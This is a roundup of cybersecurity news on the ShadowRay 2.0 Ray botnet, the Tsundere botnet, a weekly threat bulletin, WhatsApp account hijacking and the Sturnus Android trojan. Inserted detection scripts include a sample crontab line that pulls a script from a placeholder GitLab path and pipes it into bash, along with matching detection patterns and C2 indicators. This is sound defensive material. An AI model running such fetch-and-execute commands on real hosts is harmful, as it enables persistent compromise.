2025-11-21 AI Startup News

ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet

Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet. The activity, codenamed ShadowRay 2.0, is an evolution of a prior wave that was observed between September 2023 and March 2024. The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig. The vulnerability has remained unpatched due to a “long-standing design decision” that’s consistent with Ray’s development best practices, which require it to be run in an isolated network and act upon trusted code.

The campaign involves submitting malicious jobs, with commands ranging from simple reconnaissance to complex multi-stage Bash and Python payloads, to an unauthenticated Ray Job Submission API (“/api/jobs/”) on exposed dashboards. The compromised Ray clusters are then used in spray-and-pray attacks to distribute the payloads to other Ray dashboards, creating a worm that can essentially spread from one victim to another. The attacks have been found to leverage GitLab and GitHub to deliver the malware, using names like “ironern440-group” and “thisisforwork440-ops” to create repositories and stash the malicious payloads. Both accounts are no longer accessible.

However, the cybercriminals have responded to takedown efforts by creating a new GitHub account, illustrating their tenacity and ability to quickly resume operations. The payloads, in turn, leverage the platform’s orchestration capabilities to pivot laterally to non-internet-facing nodes, spread the malware, create reverse shells to attacker-controlled infrastructure for remote control, and establish persistence by running a cron job every 15 minutes that pulls the latest version of the malware from GitLab to re-infect the hosts. The threat actors “have turned Ray’s legitimate orchestration features into tools for a self-propagating, globally cryptojacking operation, spreading autonomously across exposed Ray clusters,” researchers Avi Lumelsky and Gal Elbaz said. The campaign has likely made use of large language models (LLMs) to create the GitLab payloads.

This assessment is based on the malware’s “structure, comments, and error handling patterns.” The infection chain involves an explicit check to determine if the victim is located in China, and if so, serves a region-specific version of the malware. It’s also designed to eliminate competition by scanning running processes for other cryptocurrency miners and terminating them – a tactic widely adopted by cryptojacking groups to maximize the mining gains from the host. Another notable aspect of the attacks is the use of various tactics to fly under the radar, including disguising malicious processes as legitimate Linux kernel worker services and limiting CPU usage to around 60%. It’s believed that the campaign may have been active since September 2024.
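As an added example (my code, not Oligo’s or the Ray project’s), the following Node.js script turns two of the host-level tells described above into detection rules and runs them over constructed telemetry: a cron entry on a short schedule that pulls a script from GitLab or GitHub and pipes it straight into a shell, and a process that calls itself a kernel worker but has a parent other than kthreadd and a real command line, which genuine kernel threads never have. The process records, the crontab and the GitLab path are assumptions invented for the demo.

```javascript
// Added example, not code from Oligo's report or the Ray project. Two host-side
// checks for behaviours the report describes: a cron job that re-pulls the payload
// from a code-hosting site every 15 minutes, and miner processes disguised as
// Linux kernel worker threads. All telemetry below is constructed for the demo.
//
// Fact the first rule relies on: genuine kernel threads (kworker/*, ksoftirqd/*)
// are children of kthreadd (PID 2) and have an empty /proc/<pid>/cmdline, because
// they have no user-space executable. A user-space binary that merely names itself
// "kworker" has a real command line and a parent other than kthreadd.

function findMasqueradingKernelWorkers(procs) {
  return procs.filter((p) => {
    const kernelLikeName = /^\[?k(worker|softirqd|threadd)\b/.test(p.comm);
    if (!kernelLikeName) return false;
    const genuine = (p.pid === 2 || p.ppid === 2) && p.cmdline === "";
    return !genuine;
  });
}

// Fetch-and-pipe persistence: a frequent cron schedule whose command downloads
// from GitLab/GitHub and feeds the result directly into a shell.
const FETCH_FROM_CODE_HOST =
  /\b(curl|wget)\b[^|;&]*\bhttps?:\/\/(www\.)?(gitlab|github|raw\.githubusercontent)\.com\//i;
const PIPE_TO_SHELL = /\|\s*(ba)?sh\b/;

function findSuspiciousCronLines(crontab, maxMinutes = 30) {
  return crontab.split("\n").filter((line) => {
    const trimmed = line.trim();
    if (!trimmed || trimmed.startsWith("#")) return false;
    const fields = trimmed.split(/\s+/);
    if (fields.length < 6) return false;
    const step = /^\*\/(\d+)$/.exec(fields[0]); // minute field like "*/15"
    const frequent = step !== null && Number(step[1]) <= maxMinutes;
    const command = fields.slice(5).join(" ");
    return frequent && FETCH_FROM_CODE_HOST.test(command) && PIPE_TO_SHELL.test(command);
  });
}

// Constructed records in the shape of /proc/<pid>/status (Pid, PPid, Name) plus cmdline.
const SAMPLE_PROCS = [
  { pid: 2, ppid: 0, comm: "kthreadd", cmdline: "" },
  { pid: 17, ppid: 2, comm: "kworker/0:1", cmdline: "" },
  { pid: 4120, ppid: 1, comm: "kworker/u8:3", cmdline: "/tmp/.cache/kworker --config /tmp/.cache/cfg.json" },
  { pid: 4130, ppid: 4100, comm: "python3", cmdline: "python3 ray_job.py" },
];

// Constructed crontab; the GitLab path is a placeholder, not an indicator from the report.
const SAMPLE_CRONTAB = [
  "# m h dom mon dow command",
  "0 3 * * * /usr/bin/apt-get update -q",
  "*/15 * * * * curl -fsSL https://gitlab.com/EXAMPLE-GROUP/EXAMPLE-REPO/-/raw/main/run.sh | bash",
  "*/5 * * * * /usr/local/bin/healthcheck.sh",
].join("\n");

console.log("masquerading kernel workers:", findMasqueradingKernelWorkers(SAMPLE_PROCS));
console.log("suspicious cron lines:", findSuspiciousCronLines(SAMPLE_CRONTAB));
```

On a real host the same fields come from /proc/<pid>/status and /proc/<pid>/cmdline, and the schedules from `crontab -l` for each user plus /etc/cron.d. The report’s third tell, the CPU cap of around 60%, needs sampling over time and is deliberately not turned into a single-snapshot rule here.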

While Ray is meant to be deployed within a “controlled network environment,” the findings show that users are exposing Ray servers to the internet, opening a lucrative attack surface for bad actors, who use the open-source tool interact.sh to identify which Ray dashboard IP addresses are exploitable. More than 230,500 Ray servers are publicly accessible. Anyscale, which originally developed Ray, has released a “Ray Open Ports Checker” tool to validate the proper configuration of clusters to prevent accidental exposure. Other mitigation strategies include configuring firewall rules to limit unauthorized access and adding authorization on top of the Ray Dashboard port (8265 by default).

“Attackers deployed sockstress, a TCP state exhaustion tool, targeting production websites. This suggests the compromised Ray clusters are being weaponized for denial-of-service attacks, possibly against competing mining pools or other infrastructure,” Oligo said. “This transforms the operation from pure cryptojacking into a multi-purpose botnet. The ability to launch DDoS attacks adds another monetization vector – attackers can rent out DDoS capacity or use it to eliminate competition.

The target port 3333 is commonly used by mining pools, suggesting attacks against rival mining infrastructure.”

Tsundere Botnet Expands Using Game Lures and Ethereum-Based C2 on Windows

Cybersecurity researchers have warned of an actively expanding botnet dubbed Tsundere that’s targeting Windows users. Active since mid-2025, the threat is designed to execute arbitrary JavaScript code retrieved from a command-and-control (C2) server, Kaspersky researcher Lisandro Ubiedo said in an analysis published today. There are currently no details on how the botnet malware is propagated; however, in at least one case, the threat actors behind the operation are said to have leveraged a legitimate Remote Monitoring and Management (RMM) tool as a conduit to download an MSI installer file from a compromised site. The names given to the malware artifacts – Valorant, r6x (Rainbow Six Siege X), and cs2 (Counter-Strike 2) – also suggest that the implant is likely being disseminated using lures for games.

It’s possible that users searching for pirated versions of these games are the target. Regardless of the method used, the fake MSI installer is designed to install Node.js and launch a loader script that’s responsible for decrypting and executing the main botnet-related payload. It also prepares the environment by downloading three legitimate libraries, namely, ws, ethers, and pm2, using an “npm install” command. “The pm2 package is installed to ensure the Tsundere bot remains active and used to launch the bot,” Ubiedo explained.

“Additionally, pm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.” Kaspersky’s analysis of the C2 panel has revealed that the malware is also propagated in the form of a PowerShell script, which performs a similar sequence of actions by deploying Node.js on the compromised host and downloading ws and ethers as dependencies. While the PowerShell infector doesn’t make use of pm2, it carries out the same actions observed in the MSI installer by creating a registry key value that ensures the bot is executed on each login by spawning a new instance of itself. The Tsundere botnet makes use of the Ethereum blockchain to fetch details of the WebSocket C2 server (e.g., ws://193.24.123[.]68:3011 or ws://185.28.119[.]179:1234), creating a resilient mechanism that allows the attackers to rotate the infrastructure simply by employing a smart contract. The contract was created on September 23, 2024, and has had 26 transactions to date.

Once the C2 address is retrieved, it checks to ensure it is a valid WebSocket URL, and then proceeds to establish a WebSocket connection with the specific address and receive JavaScript code sent by the server. Kaspersky said it did not observe any follow-up commands from the server during the observation period. “The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions,” Kaspersky said. The botnet operations are facilitated by a control panel that allows logged-in users to build new artifacts using MSI or PowerShell, manage administrative functions, view the number of bots at any given point of time, turn their bots into a proxy for routing malicious traffic, and even browse and purchase botnets via a dedicated marketplace.
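The infection chain described above leaves three artefacts a defender can look for: an installer (msiexec or PowerShell) running `npm install` for ws and ethers, a Run key whose value launches Node.js from a user-writable path, and a Node.js process opening a connection to a bare IP address on a high port. As an added example (my code, not Kaspersky’s), the following Node.js script encodes those three as triage rules and runs them over constructed endpoint telemetry; the event shape loosely follows Sysmon fields, and the paths, key names and 203.0.113.x address are invented for the demo.

```javascript
// Added example, not Kaspersky's code. Triage rules for the Tsundere infection
// chain, run over constructed endpoint telemetry. Event shapes loosely follow
// Sysmon fields (image, parentImage, commandLine, key, data, destHost, destPort)
// but are invented for this demo, as are the paths and the 203.0.113.x address
// (RFC 5737 documentation range).

const RUN_KEY = /\\CurrentVersion\\Run\\/i;        // per-user or machine Run key
const NODE_OR_PM2 = /\b(node(\.exe)?|pm2)\b/i;     // bot runs under Node.js, kept alive by pm2
const USER_WRITABLE = /\\(Users|ProgramData|Temp)\\/i;
const BOT_DEPENDENCIES = ["ws", "ethers"];         // installed by both the MSI and PowerShell infectors
const LITERAL_IPV4 = /^\d{1,3}(\.\d{1,3}){3}$/;    // C2 is a bare IP:port fetched from the Ethereum contract

function triageTsundere(events) {
  const findings = [];
  for (const e of events) {
    // Rule 1: Run key value that starts Node.js with a script from a user-writable location.
    if (e.type === "registry_set" && RUN_KEY.test(e.key)
        && NODE_OR_PM2.test(e.data) && USER_WRITABLE.test(e.data)) {
      findings.push({ rule: "run-key-launches-node", evidence: e.data });
    }
    // Rule 2: an installer process (msiexec/PowerShell) pulling the bot's dependencies via npm.
    if (e.type === "process_create" && /\bnpm(\.cmd)?\b/i.test(e.commandLine)
        && /\binstall\b/i.test(e.commandLine)
        && BOT_DEPENDENCIES.every((dep) => new RegExp(`\\b${dep}\\b`, "i").test(e.commandLine))
        && /(msiexec|powershell)(\.exe)?$/i.test(e.parentImage)) {
      findings.push({ rule: "installer-pulls-bot-dependencies", evidence: e.commandLine });
    }
    // Rule 3: Node.js talking to a literal IPv4 address on a non-privileged port (no hostname, no TLS port).
    if (e.type === "network_connect" && /\\node(\.exe)?$/i.test(e.image)
        && LITERAL_IPV4.test(e.destHost) && e.destPort >= 1024) {
      findings.push({ rule: "node-websocket-to-literal-ip", evidence: `${e.destHost}:${e.destPort}` });
    }
  }
  return findings;
}

// Constructed telemetry: three events mirroring the chain, plus benign noise that must not fire.
const SAMPLE_EVENTS = [
  { type: "process_create", image: "C:\\Program Files\\nodejs\\npm.cmd",
    parentImage: "C:\\Windows\\System32\\msiexec.exe",
    commandLine: "\"C:\\Program Files\\nodejs\\npm.cmd\" install ws ethers pm2 --silent" },
  { type: "registry_set", key: "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Valorant",
    data: "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\alice\\AppData\\Local\\Temp\\r6x\\loader.js" },
  { type: "network_connect", image: "C:\\Program Files\\nodejs\\node.exe",
    destHost: "203.0.113.10", destPort: 3011 },
  { type: "registry_set", key: "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
    data: "\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background" },
  { type: "network_connect", image: "C:\\Program Files\\nodejs\\node.exe",
    destHost: "registry.npmjs.org", destPort: 443 },
  { type: "process_create", image: "C:\\Program Files\\nodejs\\npm.cmd",
    parentImage: "C:\\Windows\\System32\\cmd.exe",
    commandLine: "npm.cmd install express" },
];

console.log(triageTsundere(SAMPLE_EVENTS));
```

Each rule on its own is noisy on a developer workstation; the value is in the conjunction, which is why the function returns all findings and leaves the “two or more rules on one host” decision to the caller.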

Exactly who is behind Tsundere is not known, but the presence of the Russian language in the source code for logging purposes alludes to a threat actor who is Russian-speaking. The activity is assessed to share functional overlaps with a malicious npm campaign documented by Checkmarx, Phylum, and Socket in November 2024. What’s more, the same server has been identified as hosting the C2 panel associated with an information stealer known as 123 Stealer, which is available on a subscription basis for $120 per month. It was first advertised by a threat actor named “koneko” on a dark web forum on June 17, 2025, per Outpost24’s KrakenLabs Team.

Another clue that points to its Russian origins is that the customers are forbidden from using the stealer to target Russia and the Commonwealth of Independent States (CIS) countries. “Violation of this rule will result in the immediate blocking of your account without explanation,” Koneko said in the post at the time. “Infections can occur through MSI and PowerShell files, which provide flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat,” Kaspersky said.


ThreatsDay Bulletin: 0-Days, LinkedIn Spies, Crypto Crimes, IoT Flaws and New Malware Waves

This week has been crazy in the world of hacking and online security. From Thailand to London to the US, we’ve seen arrests, spies at work, and big power moves online. Hackers are getting caught. Spies are getting better at their jobs.

Even simple things like browser add-ons and smart home gadgets are being used to attack people. Every day, there’s a new story that shows how quickly things are changing in the fight over the internet. Governments are cracking down harder on cybercriminals. Big tech companies are rushing to fix their security.

Researchers keep finding weak spots in apps and devices we use every day. We saw fake job recruiters on LinkedIn spying on people, huge crypto money-laundering cases, and brand-new malware made just to beat Apple’s Mac protections. All these stories remind us: the same tech that makes life better can very easily be turned into a weapon. Here’s a simple look at the biggest cybersecurity news happening right now — from the hidden parts of the dark web to the main battles between countries online.

Chinese operatives mine LinkedIn for political intel

MI5 Warns of Chinese Spies Using LinkedIn to Gather Intel on Lawmakers

U.K.’s domestic intelligence agency MI5 has warned lawmakers that Chinese spies are actively reaching out to “recruit and cultivate” them with lucrative job offers on LinkedIn via headhunters or cover companies. Chinese nationals are said to be using LinkedIn profiles to conduct outreach at scale, allegedly on behalf of the Chinese Ministry of State Security. “Their aim is to collect information and lay the groundwork for long-term relationships, using professional networking sites, recruitment agents and consultants acting on their behalf,” House of Commons Speaker Sir Lindsay Hoyle said. The activity is assessed to be “targeted and widespread.” Targets included parliamentary staff, economists, think tank consultants, and government officials.

In a statement shared with BBC, a spokesperson for the Chinese embassy in the UK said accusations of espionage were “pure fabrication” and accused the U.K. of a “self-staged charade.” MI5 is not the only intelligence agency to warn about social media’s potential to allow spying. In July, Mike Burgess, the Director-General of Australia’s Security Intelligence Organization (ASIO), said a foreign intelligence agency tried to find info about an Australian military project by cultivating relationships with people who worked on it.

EU rewires privacy playbook

E.U. Floats Proposal for GDPR Changes

The European Commission unveiled a proposal for major changes to the European Union’s General Data Protection Regulation (GDPR) and AI Act. Under the new “digital omnibus” package, the E.U. aims to simplify the GDPR and “clarify the definition of personal data” to allow companies to lawfully process personal data for AI training without prior consent from users, on a “legitimate interest” basis, as long as they do not break any laws. The move has been criticized for pandering to Big Tech’s interests.

It also amends cookie consent rules on websites, allowing users to “indicate their consent with one-click and save their cookie preferences through central settings of preferences in browsers and operating systems” instead of having to confirm their choice on every website they visit. “Taken together, these changes give both state authorities and powerful companies more room to collect and process personal information with limited oversight and reduced transparency,” European Digital Rights (EDRi) said. “People will lose straightforward safeguards, and minoritised communities will face even higher exposure to profiling, automated decisions and intrusive monitoring.” Austrian privacy non-profit noyb said the changes “are not ‘maintaining the highest level of personal data protection,’ but massively lower protections for Europeans.”

Browser add-ons turned into data siphons

Malicious Browser Extensions Steal Data

Threat actors are leveraging malicious VPN and ad-blocking extensions for Google Chrome and Microsoft Edge browsers to steal sensitive data. The extensions were collectively installed about 31,000 times.

The extensions, once installed, could intercept and redirect every web page visited by users, collect browsing data and a list of installed extensions, modify or disable other proxy or security tools, and route traffic through attacker-controlled servers, LayerX said. The names of some of the extensions are VPN Professional: Free Unlimited VPN Proxy, Free Unlimited VPN, VPN-free.pro - Free Unlimited VPN for Secure Browsing, Ads Blocker - Block All Ads & Protect Privacy, and Ads Cleaner for Facebook.

Crypto launderer’s luxury spree unravels

California Man Pleads Guilty to Laundering Crypto Stolen in $230M Scam

A 45-year-old from Irvine, California, has pleaded guilty to laundering at least $25 million stolen in a massive $230 million cryptocurrency scam. Kunal Mehta (aka “Papa,” “The Accountant,” and “Shrek”) is the eighth defendant to plead guilty for his participation in this scheme following charges brought by the Department of Justice in May 2025.

The scheme used social engineering to steal hundreds of millions of dollars in cryptocurrency from victims throughout the U.S. through elaborate ruses committed online and through spoofed phone numbers between around October 2023 and March 2025, according to the U.S. Justice Department. The stolen proceeds were used to purchase luxury goods, rental homes, a team of private security guards, and exotic cars. “Mehta created multiple shell companies in 2024 for the purpose of laundering funds through bank accounts created to give the appearance of legitimacy,” the DoJ said.

“To facilitate crypto-to-wire money laundering services, Mehta received stolen cryptocurrency from the group, which they had already laundered. Mehta then transferred the cryptocurrency to associates who further laundered it through sophisticated blockchain laundering techniques. The stolen funds returned to Mehta’s shell company bank accounts through incoming wire transfers from additional shell companies organized by others throughout the United States.” Mehta also personally delivered cash when requested by the members, while also performing wire transfers and facilitating exotic car purchases in exchange for a 10% fee.

Critical Oracle bug opens door to full system takeover

Security Flaw in Oracle Identity Manager

Cybersecurity researchers have disclosed details of a critical security flaw in the Identity Manager product of Oracle Fusion Middleware (CVE-2025-61757, CVSS score: 9.8) that allows an unauthenticated attacker with network access via HTTP to compromise and take control of susceptible systems.

The vulnerability affects versions 12.2.1.4.0 and 14.1.2.1.0. “This pre-authentication RCE we found would also have been able to breach login.us2.oraclecloud.com, as it was running both OAM and OIM,” Searchlight Cyber’s Adam Kues and Shubham Shah said. “The vulnerability our team discovered follows a familiar pattern in Java: filters designed to restrict authentication often contain easy-to-exploit authentication bypass flaws. Logical flaws in how Java interprets request URIs are a gift that continues giving when paired with matrix parameters.” Oracle addressed the vulnerability last month.

Smart relay flaw triggers repeat reboots

Security Flaw in Shelly Pro 4PM Smart Relay

A critical security flaw has been disclosed in the Shelly Pro 4PM smart relay (CVE-2025-11243, CVSS score: 8.3) that an attacker could exploit to cause a device reboot, limiting the ability to detect abnormal power consumption or exposing circuits to undesirable safety risks. “Unexpected inputs to multiple JSON-RPC methods on the Shelly Pro 4PM v1.4.4 can exhaust resources and trigger device reboots,” Nozomi Networks said. “While the issue does not enable code execution or data theft, it can be used to systematically cause repeatable outages—impacting automation routines and visibility in both home and building contexts.” Users are advised to update to version 1.6.0 and avoid direct internet exposure.

Crypto mixer founders jailed for laundering millions

Samourai Wallet Co-Founders Get Multi-Year Prison Term

Keonne Rodriguez and William Lonergan Hill, co-founders of the crypto mixing service Samourai Wallet, were sentenced to five and four years in prison, respectively, for their role in facilitating over $237 million in illegal transactions.

Both defendants pleaded guilty to charges of knowingly transmitting criminal proceeds back in August 2025. The defendants, per U.S. prosecutors, designed Samourai around a Bitcoin mixing service known as Whirlpool and Ricochet to conceal the nature of illicit transactions. “Over $237 million of criminal proceeds laundered through Samourai came from, among other things, drug trafficking, darknet marketplaces, cyber-intrusions, frauds, sanctioned jurisdictions, murder-for-hire schemes, and a child pornography website,” the U.S. Justice Department said.

glob CLI flaw opens door to code injection

Security Flaw in glob CLI

A security flaw (CVE-2025-64756, CVSS score: 7.5) has been identified in glob CLI’s -c/--cmd flag that could result in operating system command injection, leading to remote code execution. “When glob -c is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges,” glob maintainers said in an alert. An attacker could leverage the flaw to execute arbitrary commands, compromising a developer's machine or paving the way for supply chain poisoning via malicious packages.

The vulnerability affects glob versions from 10.2.0 through 11.0.3. It has been patched in versions 10.5.0, 11.1.0, and 12.0.0. According to AISLE, which discovered and reported the flaw along with Gyde04, “you are not affected if you only use glob’s library API (glob(), globSync(), async iterators) without invoking the CLI tool.”

Russian cyber operative caught in Phuket

Russian Hacker Wanted by U.S. Arrested in Thailand

A Russian national alleged to be affiliated with the Void Blizzard (aka Laundry Bear) hacking group has been arrested in Phuket, according to CNN.

Denis Obrezko, 35, was arrested on November 6, 2025, as part of a joint operation between the U.S. Federal Bureau of Investigation (FBI) and Thai officials. He was arrested a week after entering the country on a flight to Phuket. Earlier this May, Microsoft attributed Void Blizzard to espionage operations targeting organizations that are important to Russian government objectives, including those in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors in Europe and North America, since at least April 2024.

X debuts encrypted messaging with PIN-secured keys

X Rolls Out Encrypted Chat

X has revealed Chat, an encrypted upgrade to the platform’s direct messaging service with support for video and voice calls, disappearing messages, and file sharing. In an X post, the social media platform said users can block screenshots and get notified of attempts. X first began rolling out encrypted DMs in May 2023 before pausing the feature on May 29, 2025, to make some improvements. “When entering Chat for the first time, a private-public key pair is created specific to each user,” the company said.

“Users are prompted to enter a PIN (which never leaves the device), which is used to keep the private key securely stored on X’s infrastructure. This private key can then be recovered from any device if the user knows the PIN. In addition to the private-public key pairs, there is a per-conversation key that is used to encrypt the content of the messages. The private-public key pairs are used to exchange the conversation key securely between participating users.”

Fake Microsoft invites fuel voice-phishing scam

Phishing Campaign Uses Entra Guest User Invites for TOAD Attacks

A new phishing campaign has been observed weaponizing Microsoft Entra guest user invitations to deceive recipients into making phone calls to attackers posing as Microsoft support.

The campaign uses Microsoft Entra tenant invitations sent from the legitimate invites@microsoft[.]com address to bypass email filters and establish trust with targets.

Jabber Zeus coder extradited to face U.S. justice

Ukrainian Extradited to U.S. Faces Charges in Jabber Zeus Case

A Ukrainian national believed to be a developer for the Jabber Zeus cybercrime group has been reportedly extradited from Italy to the U.S.

The man, Yuriy Igorevich Rybtsov, 41, of Donetsk, is alleged to be MrICQ (aka John Doe #3), according to a report from security journalist Brian Krebs. He is accused of handling notifications of newly compromised entities, as well as of laundering the illicit proceeds from the scheme. Another member of the group, Vyacheslav “Tank” Igorevich Penchukov, pleaded guilty to his role in two different malware schemes, Zeus and IcedID, in February 2024. Later that July, he was sentenced to 18 years and ordered to pay more than $73 million in restitution to victims.

Speaking exclusively to the BBC earlier this month, the 39-year-old described himself as a “friendly guy.” At one point, he ditched cybercrime to start a company buying and selling coal, only to be lured back into it due to the allure of ransomware. In the meantime, he is also learning French and English. Penchukov also acknowledged that Russian cybercrime groups worked with security services, such as the FSB. “You can’t make friends in cybercrime, because the next day, your friends will be arrested and they will become an informant,” he was quoted as saying.

“Paranoia is a constant friend of hackers.” In a report published this month, Analyst1 researcher Anastasia Sentsova said, “the Russian state has gotten its hands dirty and set up several hacktivist groups to support its war in Ukraine.”

Media Land hit with sanctions over ransomware links

Russian Bulletproof Hosting Provider Media Land Sanctioned for Ransomware Ties

The U.S., the U.K., and Australia have sanctioned Russian bulletproof hosting (BPH) provider Media Land and its executives, including general director Aleksandr Volosovik (aka Yalishanda), for providing services to cybercrime and ransomware groups like Evil Corp, LockBit, Black Basta, BlackSuit, and Play. The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) has also designated Hypercore Ltd., a front company of Aeza Group LLC (Aeza Group), along with two additional individuals and two entities that have led, materially supported, or acted for Aeza Group, including Maksim Vladimirovich Makarov, Ilya Vladislavovich Zakirov, Smart Digital Ideas DOO, and Datavice MCHJ. “These so-called bulletproof hosting service providers like Media Land provide cybercriminals essential services to aid them in attacking businesses in the United States and in allied countries,” said Under Secretary of the Treasury for Terrorism and Financial Intelligence John K. Hurley. In tandem, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert to help internet service providers and network defenders mitigate the risks posed by BPH providers. “These providers enable malicious activities such as ransomware, phishing, malware delivery, and denial-of-service (DoS) attacks, posing an imminent and significant risk to the resilience and safety of critical systems and services,” CISA said.

Researchers reengineer PoolParty in C#

Porting PoolParty from C++ to C#

Cybersecurity researchers have released a C# implementation of PoolParty, a collection of process injection techniques that target Windows Thread Pools to evade endpoint detection and response (EDR) systems. PoolParty was first detailed by SafeBreach in late 2023. Its C# implementation, codenamed SharpParty by Trustwave and Stroz Friedberg, enables the PoolParty techniques to be used in tools that leverage inline MSBuild tasks in XML files.

New macOS malware hijacks crypto apps

New NovaStealer Spotted

Cybersecurity researchers have detailed a new macOS stealer malware called NovaStealer that can exfiltrate wallet-related files, collect telemetry data, and replace legitimate Ledger/Trezor applications with tampered copies.

“An unknown dropper fetches and runs mdriversinstall.sh, which installs a small scripts orchestrator under ~/.mdrivers and registers a LaunchAgent labeled application.com.artificialintelligence,” a security researcher who goes by the name Bruce said. “This orchestrator pulls additional scripts encoded in b64 from the C2, drops them under ~/.mdrivers/scripts, and runs them in detached screen sessions in the background. It supports updates and handles the restart of responsible screen sessions.”

Every week, new online dangers pop up. Real stories show how much our daily lives depend on the internet.

The same apps and tools that make life quicker and easier can also let bad guys in. It’s not just for experts anymore. Anyone who goes online, clicks links, or shares stuff needs to pay attention. Governments try to catch hackers, and experts find secret weak spots.

But one thing is always true: keeping our digital world safe never ends. The best thing we can do is learn from what happens, fix our apps and passwords, and watch out for new tricks. I’ll keep sharing simple updates and closer looks at the big stories about cyber threats, privacy, and staying safe online.


CTM360 Exposes a Global WhatsApp Hijacking Campaign: HackOnChat

CTM360 has identified a rapidly expanding WhatsApp account-hacking campaign targeting users worldwide via a network of deceptive authentication portals and impersonation pages. The campaign, internally dubbed HackOnChat, abuses WhatsApp’s familiar web interface, using social engineering tactics to trick users into compromising their accounts. Investigators identified thousands of malicious URLs being hosted on inexpensive top-level domains and rapidly generated through modern website-building platforms, allowing attackers to deploy new pages at scale. The campaign’s activity logs show hundreds of incidents in recent weeks, with a noticeable surge across the Middle East and Asia.

Read the full report here: https://www.ctm360.com/reports/hackonchat-unmasking-the-whatsapp-hacking-scam

The hacking operations and the exploitation techniques

Two techniques dominate these hacking operations: Session Hijacking, where threat actors misuse the linked-device functionality to hijack active WhatsApp Web sessions, and Account Takeover, which involves deceiving victims into surrendering authentication keys, granting attackers full control of their accounts. Attackers push these links using templates of fake security alerts, WhatsApp Web lookalike portals, and spoofed group-invite messages. These sites are further optimized for global reach, featuring multilingual support and a country-code selector that adapts the interface for users across multiple regions.

Once scammers gain control of a WhatsApp account, they exploit it to target the victim’s contacts, often requesting money or sensitive information under the guise of a trusted source. They may also sift through messages, media, and documents to steal personal, financial, or private data, which can be used for fraud, impersonation, or extortion. Frequently, these attacks extend further as the compromised account is used to send phishing messages to the victim’s contacts, creating a chain of attacks that spreads the scam. HackOnChat demonstrates that social engineering remains one of the most scalable attack vectors today, especially when attackers exploit trusted and familiar interfaces and the human trust built around them.

Read the full report here and explore all of CTM360’s latest insights and threat intelligence. Learn more at www.ctm360.com

This article is a contributed piece from one of our valued partners.

New Sturnus Android Trojan Quietly Captures Encrypted Chats and Hijacks Devices

Cybersecurity researchers have disclosed details of a new Android banking trojan called Sturnus that enables credential theft and full device takeover to conduct financial fraud. “A key differentiator is its ability to bypass encrypted messaging,” ThreatFabric said in a report shared with The Hacker News. “By capturing content directly from the device screen after decryption, Sturnus can monitor communications via WhatsApp, Telegram, and Signal.” Another notable feature is its ability to stage overlay attacks by serving fake login screens atop banking apps to capture victims’ credentials. According to the Dutch mobile security company, Sturnus is privately operated and is currently assessed to be in the evaluation stage.

Artifacts distributing the banking malware are listed below:

- Google Chrome (“com.klivkfbky.izaybebnx”)
- Preemix Box (“com.uvxuthoq.noscjahae”)

The malware has been designed to specifically single out financial institutions across Southern and Central Europe with region-specific overlays. The name Sturnus is a nod to its use of a mixed communication pattern blending plaintext, AES, and RSA, with ThreatFabric likening it to the European starling (binomial name: Sturnus vulgaris), which incorporates a variety of whistles and is known to be a vocal mimic. The trojan, once launched, contacts a remote server over WebSocket and HTTP channels to register the device and receive encrypted payloads in return. It also establishes a WebSocket channel to allow the threat actors to interact with the compromised Android device during Virtual Network Computing (VNC) sessions.

Besides serving fake overlays for banking apps, Sturnus is also capable of abusing Android’s accessibility services to capture keystrokes and record user interface (UI) interactions. As soon as an overlay for a bank is served to the victim and the credentials are harvested, the overlay for that specific target is disabled so as not to arouse the user’s suspicion. Furthermore, it can display a full-screen overlay that blocks all visual feedback and mimics the Android operating system update screen to give the impression to the user that software updates are in progress, when, in reality, it allows malicious actions to be carried out in the background. Some of the malware’s other features include support for monitoring device activity, as well as leveraging accessibility services to gather chat contents from Signal, Telegram, and WhatsApp when they are opened by the victim, and send details about every visible interface element on the screen.

This allows the attackers to reconstruct the layout at their end and remotely issue actions related to clicks, text input, scrolling, app launches, permission confirmations, and even enable a black screen overlay. An alternate remote control mechanism packed into Sturnus uses the system’s display-capture framework to mirror the device screen in real-time. “Whenever the user navigates to settings screens that could disable its administrator status, the malware detects the attempt through accessibility monitoring, identifies relevant controls, and automatically navigates away from the page to interrupt the user,” ThreatFabric said. “Until its administrator rights are manually revoked, both ordinary uninstallation and removal through tools like ADB are blocked, giving the malware strong protection against cleanup attempts.” The extensive environment monitoring capabilities make it possible to collect sensor information, network conditions, hardware data, and an inventory of installed apps.

This device profile serves as a continuous feedback loop, helping attackers adapt their tactics to sidestep detection. “Although the spread remains limited at this stage, the combination of targeted geography and high-value application focus implies that the attackers are refining their tooling ahead of broader or more coordinated operations,” ThreatFabric said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Iran-Linked Hackers Mapped Ship AIS Data Days Before Real-World Missile Strike Attempt

